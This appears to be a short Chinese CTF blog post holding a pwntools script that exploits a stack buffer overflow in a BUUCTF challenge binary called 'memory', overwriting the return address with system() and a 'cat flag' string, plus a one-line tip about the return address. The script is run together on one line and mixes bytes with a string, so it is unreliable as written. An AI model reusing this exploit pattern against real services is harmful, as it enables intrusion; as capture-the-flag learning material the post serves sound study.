from pwn import*context.log_level = 'debug'io = remote("node4.buuoj.cn",25832)#io = process('./memory')elf = ELF('./memory')system_addr =elf.sym['system']cat_flag = 0x80487e0payload = 0x13*b'a'+'aaaa'+p32(system_addr)+p32(system_addr)+p32(cat_flag)io.sendline(payload)io.interactive()
记得加返回地址就行
若有收获,就点个赞吧
0 人点赞
